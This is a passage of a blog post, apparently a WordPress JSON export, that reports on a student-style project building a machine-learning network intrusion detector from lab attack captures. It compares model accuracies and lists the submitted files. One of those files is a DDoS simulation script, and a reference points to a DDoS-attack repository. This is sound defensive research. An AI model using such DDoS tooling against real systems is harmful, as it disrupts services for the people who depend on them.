src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=1243%2C812&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?w=1243&amp;ssl=1 1243w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=1024%2C669&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=768%2C502&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/strong><\/p>\n<p>Correctly Classified Instances 15815 96.0464 %<\/p>\n<p>Incorrectly Classified Instances 651 3.9536 %<\/p>\n<h4><a id=\"post-4392-_Toc80553239\"><\/a>Na\u00efve Bayes<\/h4>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1241\" height=\"811\" class=\"wp-image-4405 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=1241%2C811&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?w=1241&amp;ssl=1 1241w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=1024%2C669&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=768%2C502&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p>Correctly Classified Instances 15216 92.4086 %<\/p>\n<p>Incorrectly Classified Instances 1250 7.5914 %<\/p>\n<h2><a id=\"post-4392-_Toc80553240\"><\/a>Summary of Weka Models<\/h2>\n<p>Based on the outputs above, J48 decision tree model gave us best accuracy so we will proceed to build a detection tool around the same.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Model<\/strong><\/td>\n<td><strong>Accuracy<\/strong><\/td>\n<\/tr>\n<tr>\n<td>J48<\/td>\n<td>98.41%<\/td>\n<\/tr>\n<tr>\n<td>MLP<\/td>\n<td>98.07%<\/td>\n<\/tr>\n<tr>\n<td>SMO<\/td>\n<td>96.05%<\/td>\n<\/tr>\n<tr>\n<td>Na\u00efve Bayes<\/td>\n<td>92.41%<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-4392-_Toc80553241\"><\/a>Building Offline Detection Tool<\/h2>\n<p>We used the below for building our offline detection tool: &#8211;<\/p>\n<ul>\n<li>Python: 3.8.5 (default, Jan 27 2021, 15:41:15)<\/li>\n<li>[GCC 9.3.0]<\/li>\n<li>scipy: 1.6.0<\/li>\n<li>numpy: 1.19.5<\/li>\n<li>matplotlib: 3.4.3<\/li>\n<li>pandas: 1.3.1<\/li>\n<li>sklearn: 0.24.2<\/li>\n<\/ul>\n<p>We\u2019ve split our data into 3 datasets, one for training, another for validation, and the last one for testing. After running this program for the default dataset \u201cmaster_dataset.csv\u201d, we get the output below: &#8211;<\/p>\n<p>We used the models below for comparison on accuracy: &#8211;<\/p>\n<ul>\n<li>&#8216;LR&#8217; : Logistic Regression<\/li>\n<li>&#8216;LDA&#8217;: Linear Discriminant Analysis<\/li>\n<li>&#8216;KNN&#8217;: KNeighbors Classifier<\/li>\n<li>&#8216;CART&#8217;: Decision Tree Classifier<\/li>\n<\/ul>\n<p>Command: <em>python3 step3_train.py<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"541\" height=\"301\" class=\"wp-image-4406 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?resize=541%2C301&#038;ssl=1\" alt=\"Diagram Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?w=541&amp;ssl=1 541w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?resize=300%2C167&amp;ssl=1 300w\" sizes=\"auto, (max-width: 541px) 100vw, 541px\" \/><\/p>\n<p>We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.<\/p>\n<p>As seen from the output below CART was reported to have maximum accuracy for the first comparison i.e. 98.21% which is very close to what we observed in Weka i.e. 98.40% accuracy.<\/p>\n<p>The accuracy of the final testing dataset was 98.31%.<\/p>\n<p>We have saved our model using the library joblib as \u201cfinalized_DT_model.sav\u201d<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1390\" height=\"876\" class=\"wp-image-4407 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=1390%2C876&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?w=1390&amp;ssl=1 1390w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=300%2C189&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=1024%2C645&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=768%2C484&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553242\"><\/a>Executing this model of new dataset<\/h3>\n<p>We initiated a fresh probe, and captured the data, converted to csv, labelled as \u201cunknown\u201d and appended it to master-dataset.csv, we ran the same model again and checked the confusion matrix, as seen below, the confusion matrix shows all counts of the probe into the fourth column which is probe itself.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"527\" height=\"666\" class=\"wp-image-4408 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?resize=527%2C666&#038;ssl=1\" alt=\"A picture containing table Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?w=527&amp;ssl=1 527w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?resize=237%2C300&amp;ssl=1 237w\" sizes=\"auto, (max-width: 527px) 100vw, 527px\" \/><\/p>\n<p>We ran the amended master-dataset.csv on Weka J48 model as well to confirm our results and as expected, it gave us similar results in the confusion matrix, it confirms that the prediction works as expected:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1240\" height=\"807\" class=\"wp-image-4409 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=1240%2C807&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?w=1240&amp;ssl=1 1240w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=300%2C195&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=1024%2C666&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=768%2C500&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h1><a id=\"post-4392-_Toc80553243\"><\/a>Results<\/h1>\n<p>We were able to successfully produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka proving that the tool we\u2019ve created and the model we\u2019ve deployed produces legitimate results.<\/p>\n<h1><a id=\"post-4392-_Toc80553244\"><\/a>Discussion<\/h1>\n<p>We had tried \u201cCICFlowmeter\u201d to perform feature extraction, while it took us days to just get it running as the majority of dependencies required by it are very old, even after getting it up and running gave erroneous outputs for the same data when subjected to multiple iterations, for example for a flow length of 2200 packets it could only generate 101 packets with output, which made us switch to t-shark instead.<\/p>\n<p>We tried different ways for attacking the metasploitable VM but given the limited resources of our laptop, the VMs would crash frequently hence we had to select the not-so-resource-intensive attack methodologies.<\/p>\n<p>We have concluded that while our model\u2019s accuracy rate is very high i.e. 98.4% accuracy, it is because the dataset we have used is small and hence resulted in some biasness, if we had to do it for a production environment with more infra resources available, we would have run the captures for days.<\/p>\n<p>We have provided below files as part of the submission.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Serial <\/strong><\/td>\n<td><strong>File<\/strong><\/td>\n<td><strong>Remark <\/strong><\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>step1_cleanup.py<\/td>\n<td>For csv cleanup<br \/>\npython3 step1_cleanup.py filename.csv<\/td>\n<\/tr>\n<tr>\n<td>2<\/td>\n<td>step2_labelling.py<\/td>\n<td>For labelling the csv<br \/>\npython2 step2_labelling.py benign updated_benign.csv<\/td>\n<\/tr>\n<tr>\n<td>3<\/td>\n<td>step3_train.py<\/td>\n<td>For training and prediction (refers to static file master_dataset.csv)<br \/>\npython3 step3_train.py<\/td>\n<\/tr>\n<tr>\n<td>4<\/td>\n<td>master_dataset.csv<\/td>\n<td>Consolidated DataSet<\/td>\n<\/tr>\n<tr>\n<td>5<\/td>\n<td>Folder<br \/>\nWireshark Captures<\/td>\n<td>Raw Attack Wireshark Captures<\/td>\n<\/tr>\n<tr>\n<td>6<\/td>\n<td>Folder<br \/>\nLabelled Data<\/td>\n<td>Individual attack CSV files<\/td>\n<\/tr>\n<tr>\n<td>7<\/td>\n<td>finalized_DT_model.sav<\/td>\n<td>Saved ML Model<\/td>\n<\/tr>\n<tr>\n<td>8<\/td>\n<td>ddos.py<\/td>\n<td>For DDoS simulation<br \/>\npython2 ddos.py<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h1><a id=\"post-4392-_Toc80553245\"><\/a>References<\/h1>\n<p><a href=\"https:\/\/machinelearningknowledge.ai\/decision-tree-classifier-in-python-sklearn-with-example\/\">https:\/\/machinelearningknowledge.ai\/decision-tree-classifier-in-python-sklearn-with-example\/<\/a><\/p>\n<p><a href=\"https:\/\/stackabuse.com\/decision-trees-in-python-with-scikit-learn\/\">https:\/\/stackabuse.com\/decision-trees-in-python-with-scikit-learn\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/Ha3MrX\/DDos-Attack\">https:\/\/github.com\/Ha3MrX\/DDos-Attack<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/bibs2091\/Anomaly-detection-system\">https:\/\/github.com\/bibs2091\/Anomaly-detection-system<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/cstub\/ml-ids\">https:\/\/github.com\/cstub\/ml-ids<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/Kihy\/pcap_data\/blob\/master\/normal_flow.csv\">https:\/\/github.com\/Kihy\/pcap_data\/blob\/master\/normal_flow.csv<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/abhishekpatel-lpu\/CICIDS-2017-intrution-detection\">https:\/\/github.com\/abhishekpatel-lpu\/CICIDS-2017-intrution-detection<\/a><\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=OmM30Nl4pqk\">https:\/\/www.youtube.com\/watch?v=OmM30Nl4pqk<\/a><\/p>\n<p><a href=\"https:\/\/thecleverprogrammer.com\/2020\/08\/12\/network-security-with-machine-learning\/\">https:\/\/thecleverprogrammer.com\/2020\/08\/12\/network-security-with-machine-learning\/<\/a><\/p>\n<p><a href=\"https:\/\/machinelearningmastery.com\/machine-learning-in-python-step-by-step\/\">https:\/\/machinelearningmastery.com\/machine-learning-in-python-step-by-step\/<\/a><\/p>\n<p><a href=\"https:\/\/stackabuse.com\/decision-trees-in-python-with-scikit-learn\/\">https:\/\/stackabuse.com\/decision-trees-in-python-with-scikit-learn\/<\/a><\/p>\n<p><a href=\"https:\/\/stackoverflow.com\/questions\/62695117\/convert-an-ip-address-into-a-string-python\">https:\/\/stackoverflow.com\/questions\/62695117\/convert-an-ip-address-into-a-string-python<\/a><\/p>\n<p><a href=\"https:\/\/stackoverflow.com\/questions\/5619685\/conversion-from-ip-string-to-integer-and-backward-in-python\">https:\/\/stackoverflow.com\/questions\/5619685\/conversion-from-ip-string-to-integer-and-backward-in-python<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[53],"tags":[62,66,61,68,60,63,67],"class_list":["post-4392","post","type-post","status-publish","format-standard","hentry","category-cyber-security","tag-attack","tag-dataset","tag-intrusion-detection","tag-machine-learning","tag-network-anomaly-detection","tag-nids","tag-tools"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4392"}],"version-history":[{"count":13,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions"}],"predecessor-version":[{"id":4422,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions\/4422"}],"wp:attachment":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}